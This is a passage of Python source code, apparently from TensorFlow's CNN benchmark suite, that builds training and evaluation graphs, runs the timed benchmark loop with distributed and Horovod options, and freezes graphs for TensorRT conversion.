self._build_eval_graph(ns) else: eval_build_results = None (graph, result_to_benchmark) = self._preprocess_graph(graph, build_result) with graph.as_default(): return self._benchmark_graph(result_to_benchmark, eval_build_results) GPU_CACHED_INPUT_VARIABLE_NAME = 'gpu_cached_inputs' def _unfreezable_local_variables(self, graph): """Get the local variables that we don't want to freeze.""" return graph.get_collection( tf.GraphKeys.LOCAL_VARIABLES, # We don't freeze the gpu_cached_images local variable so it won't get # constant folded with ops which process the input. 
scope='.*' + BenchmarkCNN.GPU_CACHED_INPUT_VARIABLE_NAME) def _build_graph(self): """Build the graph. Returns: A namedtuple containing the ops/tensors that required by _benchmark_graph(). """ if self.params.variable_update == 'distributed_all_reduce': self.single_session = True (input_producer_op, enqueue_ops, fetches) = ( self._build_model_single_session()) else: self.single_session = False (input_producer_op, enqueue_ops, fetches) = self._build_model() fetches_list = nest.flatten(list(fetches.values())) main_fetch_group = tf.group(*fetches_list, name='main_fetch_group') execution_barrier = None if (not self.single_session and self.job_name and not self.params.cross_replica_sync): execution_barrier = self.add_sync_queues_and_barrier( 'execution_barrier_', []) global_step = tf.train.get_global_step() with tf.device(self.global_step_device), tf.name_scope('inc_global_step'): with tf.control_dependencies([main_fetch_group]): fetches['inc_global_step'] = global_step.assign_add(1) if ((not self.single_session) and (not self.distributed_collective) and self.job_name and self.params.cross_replica_sync): # Block all replicas until all replicas are ready for next step. fetches['sync_queues'] = self.add_sync_queues_and_barrier( 'sync_queues_step_end_', [main_fetch_group]) # Skips the init ops for freezable local variables in forward_only mode so # we can remove all the assign ops when converting variables to constants. with tf.name_scope('local_variable_initialization'): if self.forward_only_and_freeze: local_var_init_op = tf.variables_initializer( self._unfreezable_local_variables(tf.get_default_graph())) else: local_var_init_op = tf.local_variables_initializer() table_init_ops = tf.tables_initializer() variable_manager_init_ops = [local_var_init_op] if table_init_ops: variable_manager_init_ops.extend([table_init_ops]) if not self.forward_only_and_freeze: with tf.control_dependencies([local_var_init_op]): variable_manager_init_ops.extend(self.variable_mgr.get_post_init_ops()) if ((not self.single_session) and (not self.distributed_collective) and self.job_name and self.params.cross_replica_sync): # Ensure all workers execute variable_manager_init_ops before they start # executing the model. variable_manager_init_ops.append( self.add_sync_queues_and_barrier('init_ops_end_', variable_manager_init_ops)) local_var_init_op_group = tf.group(*variable_manager_init_ops, name='local_var_init_op_group') summary_op = tf.summary.merge_all() return GraphInfo( input_producer_op=input_producer_op, enqueue_ops=enqueue_ops, fetches=fetches, execution_barrier=execution_barrier, global_step=global_step, local_var_init_op_group=local_var_init_op_group, summary_op=summary_op) def _benchmark_graph(self, graph_info, eval_graph_info): """Benchmark the training graph. Args: graph_info: the namedtuple returned by _build_graph() which contains all necessary information to benchmark the graph, including named tensors/ops list, fetches, etc. eval_graph_info: Similar to graph_info but for the eval graph if --eval_during_training_* is used. Otherwise, None. Returns: Dictionary containing training statistics (num_workers, num_steps, average_wall_time, images_per_sec). """ log_fn('Initializing graph') if self.params.variable_update == 'horovod': import horovod.tensorflow as hvd # pylint: disable=g-import-not-at-top # First worker will be 'chief' - it will write summaries and # save checkpoints. 
is_chief = hvd.rank() == 0 else: is_chief = (not self.job_name or self.task_index == 0) summary_writer = None if (is_chief and self.params.summary_verbosity and self.params.train_dir and self.params.save_summaries_steps > 0): summary_writer = tf.summary.FileWriter(self.params.train_dir, tf.get_default_graph()) # We want to start the benchmark timer right after a image_producer barrier # and avoids undesired waiting times on barriers. if ((self.num_warmup_batches + len(graph_info.enqueue_ops) - 1) % self.batch_group_size) != 0: self.num_warmup_batches = int( math.ceil( (self.num_warmup_batches + len(graph_info.enqueue_ops) - 1.0) / (self.batch_group_size)) * self.batch_group_size - len(graph_info.enqueue_ops) + 1) log_fn('Round up warm up steps to %d to match batch_group_size' % self.num_warmup_batches) assert ((self.num_warmup_batches + len(graph_info.enqueue_ops) - 1) % self.batch_group_size) == 0 # We run the summaries in the same thread as the training operations by # passing in None for summary_op to avoid a summary_thread being started. # Running summaries and training operations in parallel could run out of # GPU memory. if is_chief and not self.forward_only_and_freeze: saver = tf.train.Saver( self.variable_mgr.savable_variables(), save_relative_paths=True, max_to_keep=self.params.max_ckpts_to_keep) else: saver = None ready_for_local_init_op = None if self.job_name and not (self.single_session or self.distributed_collective): # In distributed mode, we don't want to run local_var_init_op_group until # the global variables are initialized, because local_var_init_op_group # may use global variables (such as in distributed replicated mode). We # don't set this in non-distributed mode, because in non-distributed mode, # local_var_init_op_group may itself initialize global variables (such as # in replicated mode). ready_for_local_init_op = tf.report_uninitialized_variables( tf.global_variables()) if self.params.variable_update == 'horovod': import horovod.tensorflow as hvd # pylint: disable=g-import-not-at-top bcast_global_variables_op = hvd.broadcast_global_variables(0) else: bcast_global_variables_op = None if self.params.variable_update == 'collective_all_reduce': # It doesn't matter what this collective_graph_key value is, # so long as it's > 0 and the same at every worker. init_run_options = tf.RunOptions() init_run_options.experimental.collective_graph_key = 6 else: init_run_options = tf.RunOptions() local_var_init_ops = [graph_info.local_var_init_op_group] if eval_graph_info: # `eval_graph_info.local_var_init_op_group` also includes some of the # training initializer ops, since it's difficult to filter them out. # Rerunning the training initializer ops is OK, but we add a control # dependency since running two sets of training initializer ops at the # same time can cause race conditions. with tf.control_dependencies(local_var_init_ops): local_var_init_ops.append(eval_graph_info.local_var_init_op_group) sv = tf.train.Supervisor( # For the purpose of Supervisor, all Horovod workers are 'chiefs', # since we want session to be initialized symmetrically on all the # workers. is_chief=is_chief or (self.params.variable_update == 'horovod' or self.distributed_collective), # Log dir should be unset on non-chief workers to prevent Horovod # workers from corrupting each other's checkpoints. 
logdir=self.params.train_dir if is_chief else None, ready_for_local_init_op=ready_for_local_init_op, local_init_op=local_var_init_ops, saver=saver, global_step=graph_info.global_step, summary_op=None, save_model_secs=self.params.save_model_secs, summary_writer=summary_writer, local_init_run_options=init_run_options) profiler = tf.profiler.Profiler() if self.params.tfprof_file else None if self.graph_file is not None: path, filename = os.path.split(self.graph_file) as_text = filename.endswith('txt') log_fn('Writing GraphDef as %s to %s' % ( # pyformat break 'text' if as_text else 'binary', self.graph_file)) tf.train.write_graph(tf.get_default_graph().as_graph_def(add_shapes=True), path, filename, as_text) start_standard_services = ( self.params.train_dir or self.dataset.queue_runner_required()) target = self.cluster_manager.get_target() if self.cluster_manager else '' with sv.managed_session( master=target, config=create_config_proto(self.params), start_standard_services=start_standard_services) as sess: # Anything that can potentially raise an OutOfRangeError with 'sess' MUST # be under this try block. The managed_session() context manager silently # ignores OutOfRangeError, so we must catch them and wrap them with # a different exception type so that they can be propagated up to the # caller. max_duration = self.params.max_duration try: stats = self.benchmark_with_session( sess, sv, graph_info, eval_graph_info, bcast_global_variables_op, is_chief, summary_writer, profiler, max_duration) except tf.errors.OutOfRangeError: raise RuntimeError( 'Received OutOfRangeError. Wrapping in Runtime error to avoid ' 'Supervisor from suppressing the error. Original OutOfRangeError ' 'with traceback:\n' + traceback.format_exc()) sv.stop() if profiler: generate_tfprof_profile(profiler, self.params.tfprof_file) return stats def benchmark_with_session(self, sess, supervisor, graph_info, eval_graph_info, bcast_global_variables_op, is_chief, summary_writer, profiler, max_duration=None): """Benchmarks the graph with the given session. Args: sess: The session to benchmark the graph with supervisor: The Supervisor that created the session. graph_info: the namedtuple returned by _build_graph() which contains all necessary information to benchmark the graph, including named tensors/ops list, fetches, etc. eval_graph_info: Similar to graph_info but for the eval graph if --eval_during_training_every_n_steps is used. Otherwise, None. bcast_global_variables_op: If Horovod is used, the op to broadcast the global variables to all the processes. None if Horovod is not used. is_chief: True if this is the chief process. summary_writer: The SummaryWriter used to write summaries, or None if summaries are not used. profiler: The tf.profiler.Profiler, or None if tfprof is not used. Returns: Dictionary containing training statistics (num_workers, num_steps, average_wall_time, images_per_sec). 
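max_duration: If not None, an approximate wall-time limit in minutes; the training loop stops once this much time has elapsed.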
""" if self.params.backbone_model_path is not None: self.model.load_backbone_model(sess, self.params.backbone_model_path) if bcast_global_variables_op: sess.run(bcast_global_variables_op) image_producer = None if graph_info.input_producer_op is not None: image_producer = cnn_util.ImageProducer( sess, graph_info.input_producer_op, self.batch_group_size, self.params.use_python32_barrier) image_producer.start() if graph_info.enqueue_ops: for i in xrange(len(graph_info.enqueue_ops)): sess.run(graph_info.enqueue_ops[:(i + 1)]) if image_producer is not None: image_producer.notify_image_consumption() self.init_global_step, = sess.run([graph_info.global_step]) if self.job_name and not self.params.cross_replica_sync: # TODO(zhengxq): Do we need to use a global step watcher at all? global_step_watcher = GlobalStepWatcher( sess, graph_info.global_step, self.num_workers * self.num_warmup_batches + self.init_global_step, self.num_workers * (self.num_warmup_batches + self.num_batches) - 1) global_step_watcher.start() else: global_step_watcher = None eval_image_producer = None if eval_graph_info: # We pass local_var_init_op_group=None because the Supervisor already # initialized local variables above. We need to have the Supervisor # initialize the local variables, because otherwise it throws an error # complaining that not all variables were initialized. eval_image_producer = self._initialize_eval_graph( eval_graph_info.enqueue_ops, eval_graph_info.input_producer_op, local_var_init_op_group=None, sess=sess) step_train_times = [] log_fn('Running warm up') local_step = -1 * self.num_warmup_batches if self.single_session: # In single session mode, each step, the global_step is incremented by # 1. In non-single session mode, each step, the global_step is # incremented once per worker. This means we need to divide # init_global_step by num_workers only in non-single session mode. end_local_step = self.num_batches - self.init_global_step else: end_local_step = self.num_batches - (self.init_global_step // self.num_workers) if not global_step_watcher: # In cross-replica sync mode, all workers must run the same number of # local steps, or else the workers running the extra step will block. done_fn = lambda: local_step >= end_local_step else: done_fn = global_step_watcher.done if self.params.debugger is not None: if self.params.debugger == 'cli': log_fn('The CLI TensorFlow debugger will be used.') sess = tf_debug.LocalCLIDebugWrapperSession(sess) else: log_fn('The TensorBoard debugger plugin will be used.') sess = tf_debug.TensorBoardDebugWrapperSession(sess, self.params.debugger) mlperf.logger.log(key=mlperf.tags.TRAIN_LOOP) skip_final_eval = False accuracy_at_1 = None last_eval_step = local_step loop_start_time = time.time() last_average_loss = None start_time_mb = datetime.datetime.now() while not done_fn(): seconds = (datetime.datetime.now() - start_time_mb).total_seconds() minutes = seconds / 60.0 if max_duration is not None and minutes >= max_duration: break if local_step == 0: log_fn('Done warm up') if graph_info.execution_barrier: log_fn('Waiting for other replicas to finish warm up') sess.run([graph_info.execution_barrier]) # TODO(laigd): rename 'Img' to maybe 'Input'. header_str = ('Step\tImg/sec\t' + self.params.loss_type_to_report.replace('/', ' ')) if self.params.print_training_accuracy or self.params.forward_only: # TODO(laigd): use the actual accuracy op names of the model. 
header_str += '\ttop_1_accuracy\ttop_5_accuracy' log_fn(header_str) assert len(step_train_times) == self.num_warmup_batches # reset times to ignore warm up batch step_train_times = [] loop_start_time = time.time() if (summary_writer and (local_step + 1) % self.params.save_summaries_steps == 0): fetch_summary = graph_info.summary_op else: fetch_summary = None collective_graph_key = 7 if ( self.params.variable_update == 'collective_all_reduce') else 0 (summary_str, last_average_loss) = benchmark_one_step( sess, graph_info.fetches, local_step, self.batch_size * (self.num_workers if self.single_session else 1), step_train_times, self.trace_filename, self.params.partitioned_graph_file_prefix, profiler, image_producer, self.params, fetch_summary, benchmark_logger=self.benchmark_logger, collective_graph_key=collective_graph_key) if summary_str is not None and is_chief: supervisor.summary_computed(sess, summary_str) local_step += 1 if (self.params.save_model_steps and local_step % self.params.save_model_steps == 0 and local_step > 0 and is_chief): supervisor.saver.save(sess, supervisor.save_path, supervisor.global_step) if (eval_graph_info and local_step > 0 and not done_fn() and self._should_eval_during_training(local_step)): python_global_step = sess.run(graph_info.global_step) num_steps_since_last_eval = local_step - last_eval_step # The INPUT_SIZE tag value might not match the # PREPROC_NUM_TRAIN_EXAMPLES tag value, because the number of examples # run, which is INPUT_SIZE, is rounded up to the nearest multiple of # self.batch_size. mlperf.logger.log( key=mlperf.tags.INPUT_SIZE, value=num_steps_since_last_eval * self.batch_size) log_fn('Running evaluation at global_step {}'.format( python_global_step)) accuracy_at_1, _ = self._eval_once( sess, summary_writer, eval_graph_info.fetches, eval_graph_info.summary_op, eval_image_producer, python_global_step) last_eval_step = local_step if (self.params.stop_at_top_1_accuracy and accuracy_at_1 >= self.params.stop_at_top_1_accuracy): log_fn('Stopping, as eval accuracy at least %s was reached' % self.params.stop_at_top_1_accuracy) skip_final_eval = True break else: log_fn('Resuming training') if eval_graph_info and self.model.reached_target(): log_fn('Stopping, as the model indicates its custom goal was reached') skip_final_eval = True break loop_end_time = time.time() # Waits for the global step to be done, regardless of done_fn. if global_step_watcher: while not global_step_watcher.done(): time.sleep(.25) if not global_step_watcher: elapsed_time = loop_end_time - loop_start_time average_wall_time = elapsed_time / local_step if local_step > 0 else 0 images_per_sec = (self.num_workers * local_step * self.batch_size / elapsed_time) num_steps = local_step * self.num_workers else: # NOTE: Each worker independently increases the global step. So, # num_steps will be the sum of the local_steps from each worker. num_steps = global_step_watcher.num_steps() elapsed_time = global_step_watcher.elapsed_time() average_wall_time = (elapsed_time * self.num_workers / num_steps if num_steps > 0 else 0) images_per_sec = num_steps * self.batch_size / elapsed_time # We skip printing images/sec if --eval_during_training_* is specified, # because we are both processing training and evaluation images, so a # singular "images/sec" value is meaningless. if self.mode != constants.BenchmarkMode.TRAIN_AND_EVAL: log_fn('-' * 64) # TODO(laigd): rename 'images' to maybe 'inputs'. 
log_fn('total images/sec: %.2f' % images_per_sec) log_fn('-' * 64) else: log_fn('Done with training') num_steps_since_last_eval = local_step - last_eval_step mlperf.logger.log( key=mlperf.tags.INPUT_SIZE, value=num_steps_since_last_eval * self.batch_size) python_global_step = sess.run(graph_info.global_step) if eval_graph_info and not skip_final_eval: log_fn('Running final evaluation at global_step {}'.format( python_global_step)) accuracy_at_1, _ = self._eval_once( sess, summary_writer, eval_graph_info.fetches, eval_graph_info.summary_op, eval_image_producer, python_global_step) num_epochs_ran = (python_global_step * self.batch_size / self.dataset.num_examples_per_epoch('train')) mlperf.logger.log_train_epochs(num_epochs_ran) if image_producer is not None: image_producer.done() if eval_image_producer is not None: eval_image_producer.done() if is_chief: if self.benchmark_logger: self.benchmark_logger.log_metric( 'average_examples_per_sec', images_per_sec, global_step=num_steps) # Save the model checkpoint. if self.params.train_dir is not None and is_chief: checkpoint_path = os.path.join(self.params.train_dir, 'model.ckpt') if not gfile.Exists(self.params.train_dir): gfile.MakeDirs(self.params.train_dir) supervisor.saver.save(sess, checkpoint_path, graph_info.global_step) if graph_info.execution_barrier: # Wait for other workers to reach the end, so this worker doesn't # go away underneath them. sess.run([graph_info.execution_barrier]) stats = { 'num_workers': self.num_workers, 'num_steps': num_steps, 'average_wall_time': average_wall_time, 'images_per_sec': images_per_sec } if last_average_loss is not None: stats['last_average_loss'] = last_average_loss success = bool(self.model.reached_target() or (accuracy_at_1 and self.params.stop_at_top_1_accuracy and accuracy_at_1 >= self.params.stop_at_top_1_accuracy)) mlperf.logger.log(key=mlperf.tags.RUN_STOP, value={'success': success}) mlperf.logger.log(key=mlperf.tags.RUN_FINAL) return stats def _should_eval_during_training(self, step): """Return True iff should run eval during training at current step.""" assert self.mode == constants.BenchmarkMode.TRAIN_AND_EVAL if self.params.eval_during_training_every_n_steps: return step % self.params.eval_during_training_every_n_steps == 0 # All other --eval_during_training_* flags are converted to step numbers # at which the model should run evaluation during training. return step in self.eval_during_training_at_specified_steps def _preprocess_graph(self, graph, graph_info): """Preprocess the graph before executing. Depending on the params, it runs various preprocessing on the graph, including freezing, TensorRT conversion, etc. Args: graph: the graph to preprocess. graph_info: the namedtuple returned by _build_graph() which contains all necessary information to benchmark the graph, including named tensors/ops list, fetches, etc. Returns: The updated graph and graph_info with the ops/tensors/fetches updated according to the imported graph. """ assert isinstance(graph_info.fetches, dict) assert isinstance(graph_info.global_step, tf.Variable) if not self.forward_only_and_freeze: return (graph, graph_info) # Get the names of the ops that need to keep during conversion. flattened_op_names = list( set([ v.name.split(':')[0] for v in nest.flatten(graph_info) if v is not None ])) # Get variables that we don't want to freeze. # Only keep unfreezable variables in forward_only_and_freeze mode. # TODO(laigd): consider making global_step a constant. 
variables_to_keep = {graph_info.global_step: tf.GraphKeys.GLOBAL_VARIABLES} variables_to_keep.update({ local_variable: tf.GraphKeys.LOCAL_VARIABLES for local_variable in self._unfreezable_local_variables(graph) }) variable_initializers = [ variable.initializer.name for variable in variables_to_keep] output_node_names = ( flattened_op_names + # Add variable initializer and read ops to the output list, so # convert_variables_to_constants() will keep them. variable_initializers + [variable.value().op.name for variable in variables_to_keep]) graphdef = graph.as_graph_def(add_shapes=True) # Freeze the graph. with graph.as_default(): with tf.Session(config=create_config_proto(self.params)) as sess: sess.run(tf.global_variables_initializer()) sess.run(tf.local_variables_initializer()) graphdef = graph_util.convert_variables_to_constants( sess, graphdef, output_node_names, variable_names_blacklist=[ variable.op.name for variable in variables_to_keep ]) # Run TensorRT conversion. if self.params.trt_mode: # Import here instead of at top, because this will crash if TensorRT is # not installed from tensorflow.contrib import tensorrt as trt # pylint: disable=g-import-not-at-top # Avoid TF-TRT bridge from touching all variable initializer ops and their # dependencies, since they can directly be fetched by sess.run()s that # initialize the variables. # pylint: disable=protected-access name_to_input_name, _, _ = graph_util_impl._extract_graph_summary( graphdef) initializer_subgraph_ops = graph_util_impl._bfs_for_reachable_nodes( variable_initializers, name_to_input_name) # pylint: enable=protected-access graphdef = trt.create_inference_graph( graphdef, outputs=output_node_names + list(initializer_subgraph_ops), max_batch_size=self.model.get_batch_size(), max_workspace_size_bytes=self.params.trt_max_workspace_size_bytes, precision_mode=self.params.trt_mode) # Creates a new graph as the default and import the converted graph back. updated_graph = tf.Graph() def _get_tensors_or_ops(inputs): """Gets the updated tensors or ops from 'updated_graph'.""" def _get_fn(element): if element is None: return None if ':' in element.name: return updated_graph.get_tensor_by_name(element.name) return updated_graph.get_operation_by_name(element.name) if isinstance(inputs, (list, dict, tuple)): return nest.map_structure(_get_fn, inputs) else: return _get_fn(inputs) with updated_graph.as_default(): importer.import_graph_def(graph_def=graphdef, name='') # Update the variables for variable in variables_to_keep: updated_variable = tf.Variable.from_proto(variable.to_proto()) tf.add_to_collection(variables_to_keep[variable], updated_variable) if variable is graph_info.global_step: updated_global_step = updated_variable updated_graph_info = GraphInfo( input_producer_op=_get_tensors_or_ops(graph_info.input_producer_op), enqueue_ops=_get_tensors_or_ops(graph_info.enqueue_ops), execution_barrier=_get_tensors_or_ops(graph_info.execution_barrier), local_var_init_op_group=_get_tensors_or_ops( graph_info.local_var_init_op_group), fetches=_get_tensors_or_ops(graph_info.fetches), global_step=updated_global_step, summary_op=None) return (updated_graph, updated_graph_info) def _build_input_processing(self, shift_ratio=0): """"Build the image (pre)processing portion of the model graph. Args: shift_ratio: shift_ratio for data_flow_ops.RecordInput. Returns: An InputProcessingInfo containing all the input sources to the model. 
""" input_processing_info = InputProcessingInfo( input_producer_op=None, input_producer_stages=None, function_buffering_resources=None, multi_device_iterator_input=None) mlperf.logger.log(key=mlperf.tags.INPUT_ORDER) if not self._doing_eval: mlperf.logger.log(key=mlperf.tags.INPUT_BATCH_SIZE, value=self.batch_size) # If using synthetic gpu inputs, do nothing on the cpu side. if self.dataset.use_synthetic_gpu_inputs(): assert not self.datasets_use_prefetch return input_processing_info if self._doing_eval: input_preprocessor = self.eval_input_preprocessor mlperf.logger.log(key=mlperf.tags.PREPROC_NUM_EVAL_EXAMPLES, value=self.dataset.num_examples_per_epoch('validation')) else: input_preprocessor = self.input_preprocessor mlperf.logger.log(key=mlperf.tags.PREPROC_NUM_TRAIN_EXAMPLES, value=self.dataset.num_examples_per_epoch('train')) # Use prefetching mechanism provided by dataset input pipeline. if self.datasets_use_prefetch: if self.params.use_multi_device_iterator: multi_device_iterator = ( input_preprocessor.build_multi_device_iterator( self.batch_size, len(self.devices), self.cpu_device, self.params, self.raw_devices, self.dataset, self._doing_eval)) return input_processing_info._replace( multi_device_iterator_input=multi_device_iterator.get_next()) subset = 'validation' if self._doing_eval else 'train' function_buffering_resources = ( input_preprocessor.build_prefetch_input_processing( self.batch_size, self.model.get_input_shapes(subset), len(self.devices), self.cpu_device, self.params, self.devices, self.model.get_input_data_types(subset), self.dataset, self._doing_eval)) return input_processing_info._replace( function_buffering_resources=function_buffering_resources) # Not using dataset prefetching. Use a staging area to mimic the prefetching # behavior instead. 
with tf.device(self.cpu_device): if self._doing_eval: subset = 'validation' else: subset = 'train' input_list = input_preprocessor.minibatch( self.dataset, subset=subset, params=self.params, shift_ratio=shift_ratio) input_producer_op = [] input_producer_stages = [] for device_num in range(len(self.devices)): staging_area = data_flow_ops.StagingArea( [parts[0].dtype for parts in input_list], shapes=[parts[0].get_shape() for parts in input_list], shared_name='input_producer_staging_area_%d_eval_%s' % (device_num, self._doing_eval)) input_producer_stages.append(staging_area) for group_index in xrange(self.batch_group_size): batch_index = group_index + device_num * self.batch_group_size put_op = staging_area.put( [parts[batch_index] for parts in input_list]) input_producer_op.append(put_op) assert input_producer_op return input_processing_info._replace( input_producer_op=input_producer_op, input_producer_stages=input_producer_stages) def _maybe_initialize_fp16(self): """Initialize fp16 settings.""" if self.params.use_fp16 and not self._doing_eval: init_loss_scale_val = float(self.params.fp16_loss_scale or self.model.get_fp16_loss_scale()) self.loss_scale = None self.loss_scale_normal_steps = None if self.enable_auto_loss_scale or init_loss_scale_val != 1: self.loss_scale = tf.get_variable( name='loss_scale', initializer=init_loss_scale_val, dtype=tf.float32, trainable=False) if self.enable_auto_loss_scale: self.loss_scale_normal_steps = tf.get_variable( name='loss_scale_normal_steps', initializer=0, trainable=False) def _build_model(self): """Build the TensorFlow graph.""" if self.datasets_use_prefetch: assert not self.params.staged_vars assert not self.variable_mgr.supports_staged_vars() # Adjust seed so different workers start read different input files. if self.params.variable_update == 'horovod': import horovod.tensorflow as hvd # pylint: disable=g-import-not-at-top seed_adjustment = hvd.rank() else: seed_adjustment = 0 mlperf.logger.log(key=mlperf.tags.RUN_SET_RANDOM_SEED, value=self.params.tf_random_seed + seed_adjustment) tf.set_random_seed(self.params.tf_random_seed + seed_adjustment) mlperf.logger.log(key=mlperf.tags.RUN_SET_RANDOM_SEED, value=4321 + seed_adjustment) np.random.seed(4321 + seed_adjustment) phase_train = not (self._doing_eval or self.params.forward_only) if self._doing_eval: mode_string = 'evaluation' else: mode_string = 'training' log_fn('Generating {} model'.format(mode_string)) losses = [] device_grads = [] all_logits = [] all_accuracy_ops = {} gpu_compute_stage_ops = [] gpu_grad_stage_ops = [] with tf.device(self.global_step_device): global_step = tf.train.get_or_create_global_step() self._maybe_initialize_fp16() # Build the processing and model for the worker. 
input_producer_op = None with tf.name_scope('input_processing'): input_processing_info = self._build_input_processing(shift_ratio=0) if input_processing_info.input_producer_op is not None: input_producer_op = tf.group(*input_processing_info.input_producer_op) update_ops = None staging_delta_ops = [] for device_num in range(len(self.devices)): with tf.name_scope('tower_%i' % device_num) as name_scope, ( self.variable_mgr.create_outer_variable_scope(device_num)): results = self.add_forward_pass_and_gradients( phase_train, device_num, device_num, input_processing_info, gpu_compute_stage_ops, gpu_grad_stage_ops) if self.params.backbone_model_path: self.model.add_backbone_saver() if phase_train: losses.append(results['loss']) device_grads.append(results['gradvars']) else: all_logits.append(results['logits']) if not phase_train or self.params.print_training_accuracy: for name, op in results.items(): if name.startswith('accuracy:'): key = name[9:] if key not in all_accuracy_ops: all_accuracy_ops[key] = [] all_accuracy_ops[key].append(op) if device_num == 0: # Retain the Batch Normalization updates operations only from the # first tower. These operations update the moving mean and moving # variance variables, which are updated (but not used) during # training, and used during evaluation. The moving mean and variance # approximate the true mean and variance across all images in the # dataset. Therefore, in replicated mode, these moving averages would # be almost identical for each tower, and so we only update and save # the moving averages for one tower. In parameter server mode, all # towers share a copy of the variables so we also only need to update # and save the moving averages once. update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS, name_scope) if self.datasets_use_prefetch: assert not self.variable_mgr.staging_delta_ops else: staging_delta_ops = list(self.variable_mgr.staging_delta_ops) enqueue_ops = [] if not self.datasets_use_prefetch: if self.variable_mgr.supports_staged_vars(): for staging_ops in self.variable_mgr.staging_vars_on_devices: gpu_compute_stage_ops.extend( [put_op for _, (put_op, _) in six.iteritems(staging_ops)]) enqueue_ops.append(tf.group(*gpu_compute_stage_ops, name='gpu_compute_stage_ops_group')) if gpu_grad_stage_ops: staging_delta_ops += gpu_grad_stage_ops if staging_delta_ops: enqueue_ops.append(tf.group(*(staging_delta_ops))) if (self.mode == constants.BenchmarkMode.TRAIN_AND_EVAL and self.params.variable_update == 'replicated'): # We need to get all the update ops instead of only those for the first # tower. This is because during evaluation, each tower will read from its # own tower's moving averages instead of the first tower's moving # averages. # TODO(reedwm): Have each tower read from the first tower's moving # averages for a slight performance gain. 
update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS) mlperf.logger.log(key=mlperf.tags.INPUT_BN_SPAN, value=self.batch_size // len(self.raw_devices)) fetches = self._build_fetches(global_step, all_logits, losses, device_grads, enqueue_ops, update_ops, all_accuracy_ops, phase_train) return (input_producer_op, enqueue_ops, fetches) def _build_fetches(self, global_step, all_logits, losses, device_grads, enqueue_ops, update_ops, all_accuracy_ops, phase_train): """Complete construction of model graph, populating the fetches map.""" fetches = {} if enqueue_ops: fetches['enqueue_ops'] = enqueue_ops for name, ops in all_accuracy_ops.items(): # For fetches that starts with 'tensor:', keep dimension and skip reducing # them to scalars. if name.startswith(constants.UNREDUCED_ACCURACY_OP_PREFIX): key = name[len(constants.UNREDUCED_ACCURACY_OP_PREFIX):] fetches[key] = tf.concat(ops, 0) else: fetches[name] = tf.reduce_sum(ops) / self.batch_size if self.task_index == 0 and self.params.summary_verbosity >= 1: tf.summary.scalar(name, fetches[name]) if not phase_train: if self.params.forward_only: fetches['all_logits'] = tf.concat(all_logits, 0) return fetches apply_gradient_devices, gradient_state = ( self.variable_mgr.preprocess_device_grads(device_grads)) # TODO(reedwm): Greatly simplify the learning rate code. if (self.params.variable_update == 'horovod' or self.params.variable_update == 'collective_all_reduce'): # Each worker independently increments global_step. examples_per_step = self.batch_size * self.num_workers else: # global_step is shared by all workers, and so every iteration # global_step is incremented by num_workers. examples_per_step = self.batch_size if self.params.compute_lr_on_cpu: with tf.device(self.cpu_device): learning_rate = get_learning_rate(self.params, global_step, self.dataset.num_examples_per_epoch(), self.model, examples_per_step) training_ops = [] for d, device in enumerate(apply_gradient_devices): with tf.device(device): with tf.name_scope('average_loss'): average_loss = tf.reduce_mean(losses) with tf.name_scope('get_gradients_to_apply'): avg_grads = self.variable_mgr.get_gradients_to_apply(d, gradient_state) if not self.params.compute_lr_on_cpu: # We compute the learning rate once for each device in # `apply_gradient_devices`. 
learning_rate = get_learning_rate( self.params, global_step, self.dataset.num_examples_per_epoch(), self.model, examples_per_step) gradient_clip = self.params.gradient_clip if gradient_clip is not None: with tf.name_scope('clip_gradients'): clipped_grads = [(tf.clip_by_value(grad, -gradient_clip, +gradient_clip), var) for grad, var in avg_grads] else: clipped_grads = avg_grads learning_rate = tf.identity(learning_rate, name='learning_rate_tensor') opt = get_optimizer(self.params, learning_rate) loss_scale_params = variable_mgr_util.AutoLossScaleParams( enable_auto_loss_scale=self.enable_auto_loss_scale, loss_scale=self.loss_scale, loss_scale_normal_steps=self.loss_scale_normal_steps, inc_loss_scale_every_n=self.params.fp16_inc_loss_scale_every_n, is_chief=not self.job_name or self.task_index == 0) with tf.name_scope('append_apply_gradient_ops'): self.variable_mgr.append_apply_gradients_ops( gradient_state, opt, clipped_grads, training_ops, loss_scale_params) train_op = tf.group(*(training_ops + update_ops), name='train_ops_group') with tf.device(self.cpu_device): if self.task_index == 0 and self.params.summary_verbosity >= 1: tf.summary.scalar('learning_rate', learning_rate) tf.summary.scalar(self.params.loss_type_to_report, average_loss) if self.loss_scale is not None: tf.summary.scalar('loss_scale', self.loss_scale) if self.loss_scale_normal_steps: tf.summary.scalar('loss_scale_normal_steps', self.loss_scale_normal_steps) if self.params.summary_verbosity >= 2: self.gradient_histogram_summary(avg_grads) if self.params.summary_verbosity >= 3: for grad, var in avg_grads: if grad is not None: tf.summary.histogram(var.op.name + '/gradients', grad) for var in tf.trainable_variables(): tf.summary.histogram(var.op.name, var) fetches['train_op'] = train_op fetches['average_loss'] = average_loss return fetches def gradient_histogram_summary(self, avg_grads): """Create histogram of log values of all non-zero gradients.""" with tf.name_scope('log_gradients_summary'): all_grads = [] for grad, _ in avg_grads: all_grads.append(tf.reshape(grad, [-1])) grads = tf.abs(tf.concat(all_grads, 0)) # exclude grads with zero values. indices_for_non_zero_grads = tf.where(tf.not_equal(grads, 0)) log_grads = tf.reshape( tf.log(tf.gather(grads, indices_for_non_zero_grads)), [-1]) tf.summary.histogram('log_gradients', log_grads) def _build_model_single_session(self): """Build the TensorFlow graph for multiple replicas in a single_session. Returns: input_producer_op: enqueue_ops: fetches: Raises: ValueError: optimizer not recognized. Single session runs multiple model replicas as part of one large distributed graph, whose global execution is always step-synchronized. """ # verify assumptions assert self.params.task_index == 0 assert not self._doing_eval assert not self.params.forward_only assert not self.params.staged_vars tf.set_random_seed(self.params.tf_random_seed) np.random.seed(4321) phase_train = True log_fn('Generating training model') losses = [] device_grads = [] all_logits = [] all_accuracy_ops = {} gpu_compute_stage_ops = [] gpu_grad_stage_ops = [] with tf.device(self.global_step_device): global_step = tf.train.get_or_create_global_step() update_ops = [] global_input_producer_op = [] is_local = not self.job_name if is_local: assert self.num_workers == 1 for task_num in range(self.num_workers): # Reset the devices that self.variable_mgr knows about to those # belonging to the next worker (task). 
